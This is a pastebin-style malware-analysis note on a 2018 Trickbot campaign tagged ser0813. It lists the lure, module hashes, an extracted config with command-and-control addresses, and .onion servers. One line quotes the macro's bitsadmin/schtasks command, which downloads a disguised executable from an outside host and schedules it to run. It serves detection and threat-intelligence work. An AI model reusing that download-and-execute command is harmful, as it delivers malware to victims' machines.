secresearcher

Trickbot version 1000245 : group_tag (gtag) : ser0813

Aug 13th, 2018
  1. #trickbot lure "Critical Notice: Statement of Liabilities" (likely the email subject line), sample shared by Racoo
  2.  
  3. Macro-enabled lure document Statement.doc > https://beta.virusbay.io/sample/browse/6f07f7104add44b4ef8393e99ecda633
  4. runs : cmd.exe /c bitsadmin /transfer msd5 /priority foreground http://onyx-tools.com/public.png %TEMP%/cCTypiwOC.exe &schtasks /create /st 14:49 /sc once /tn srx3 /tr %TEMP%/cCTypiwOC.exe
     (two LOLBins: bitsadmin fetches a PE served as "public.png" into %TEMP%, then schtasks registers a one-shot task "srx3" at 14:49 to launch it; the BITS job name, download URL, task name and %TEMP% path are all usable detection artifacts)
  5.  
  6. Drops : public.png (SHA-256) : 00e5e57d672145f33b866b37ec714c0078f3ad2e9e9eab6f284df2af7784d4bf
  7. Sandbox run (any.run) : https://app.any.run/tasks/c9b085d8-7747-4e6a-b2eb-49a0cfff7798
  8.  
  9. Installation dir > %APPDATA%\vcmsd (...\AppData\Roaming\vcmsd)
  10.  
  11. Modules (SHA-256 : path relative to the installation dir)
  12. 00e5e57d672145f33b866b37ec714c0078f3ad2e9e9eab6f284df2af7784d4bf ./cDTypiwOD.exe   (same hash as public.png above; note the file name differs from the one used in the macro's scheduled task)
  13. f0eee12966ca8156ef9483304b6a018e0130e414fe83242e02e7c79526907c36 ./info.dat
  14. bbb018456a06339dd74c8c1bdc90ad880af731bcefa152584340b2e4fd8c9b8d ./FAQ
  15. 38955b875a8d00cce78dcf823ed35091fb6f07e5bf3c3638e9abf1feadf5fe18 ./README.md
  16. 2bab8ba30719a42213db0087572e481f14de7cdf7bffe1a1be17db9f09d70525 ./Modules/networkDll32
  17. 70dccaa8296d3101e33f952eb2a927a21f428786f1f8db724eaf918408e348cf ./Modules/systeminfo32
  18. 18c9e21685ab93786ffe5d2046526419057ee315551695186caedfc1189d25b5 ./Modules/injectDll32
  19. 3a6b6777fef3a63f5d140be36abe76d28eb3251ecd6da1a50eb9d4c92e64aad4 ./Modules/networkDll32_configs/dpost
  20. c84da3e052b1d0efd8d1bfbde2c48d05bbe6ad5435fd12b7749ca724a9a11439 ./Modules/injectDll32_configs/dinj
  21. edb17b2f4e39f45022597a80b3d9f8e64283d8e6103ed80973f243903a9502ef ./Modules/injectDll32_configs/sinj
  22. 3a6b6777fef3a63f5d140be36abe76d28eb3251ecd6da1a50eb9d4c92e64aad4 ./Modules/injectDll32_configs/dpost   (identical to networkDll32_configs/dpost above)
  23. Main config (mcconf) extracted from the sample - version, gtag and the 443/449 C2 server list:
  24. <mcconf>
  25. <ver>1000245</ver>
  26. <gtag>ser0813</gtag>
  27. <servs><srv>185.106.162.4:443</srv>
  28. <srv>85.9.212.117:443</srv>
  29. <srv>82.164.118.12:443</srv>
  30. <srv>198.53.63.120:443</srv>
  31. <srv>158.58.131.54:443</srv>
  32. <srv>185.106.162.9:449</srv>
  33. <srv>118.200.151.113:443</srv>
  34. <srv>36.67.215.93:449</srv>
  35. <srv>41.211.9.234:449</srv>
  36. <srv>178.78.202.189:443</srv>
  37. <srv>185.106.162.89:449</srv>
  38. <srv>212.225.214.249:449</srv>
  39. <srv>68.169.161.5:443</srv>
  40. <srv>148.66.40.98:443</srv>
  41. <srv>103.205.112.58:443</srv>
  42. <srv>182.253.210.130:449</srv>
  43. <srv>47.49.168.50:443</srv>
  44. <srv>70.79.178.120:449</srv>
  45. <srv>68.109.83.22:443</srv>
  46. <srv>176.10.170.65:443</srv>
  47. <srv>84.237.228.13:443</srv>
  48. <srv>96.43.40.221:443</srv>
  49. <srv>195.133.145.121:443</srv>
  50. <srv>92.53.67.154:443</srv>
  51. <srv>91.235.128.139:443</srv>
  52. <srv>109.234.39.194:443</srv>
  53. <srv>83.220.168.185:443</srv>
  54. <srv>37.230.116.52:443</srv>
  55. <srv>78.155.207.102:443</srv></servs>
  56. <autorun>
  57. <module name="systeminfo" ctl="GetSystemInfo"/>
  58. <module name="injectDll"/>
  59. </autorun>
  60. </mcconf>
  61.  
  62.  
  63. POST (module check-in; the first path segment is the gtag ser0813 from the mcconf above, the last is the reporting module systeminfo32; the destination 109.234.38.201:447 is from the 447/448 server set below, not from the mcconf list)
  64. https://109.234.38.201:447/ser0813/USERNAME-PC_W617601.3D5D4D47640CB0626DF2AA7B550228C5/5/systeminfo32/
  65.  
  66.  
  67. 0x287b1c, 88, <ssert>
  68. <expir>1546214400</expir>
  69. </ssert>   (expir 1546214400 = 2018-12-31 00:00:00 UTC; "0x287b1c, 88" is presumably the offset/size of this fragment in the sample - unverified. This fragment and the 447/448 servers below appear to be a separate embedded config from the mcconf above.)
  70. 3gihg5esw7lxg2wh.onion:448
  71. 185.251.39.124:447
  72. 46.21.248.207:447
  73. 109.234.38.201:447
      185.251.38.104:447
  74. 95.213.204.86:447
  75. gihg5esw7lxg2wh.onion:448
  76. cgihg5esw7lxg2wh.onion:448   (the three .onion entries look like variants of one address; "gihg5esw7lxg2wh" is 15 characters, one short of a v2 onion address, so at least that entry is truncated - verify against the config before using any of them as an IOC)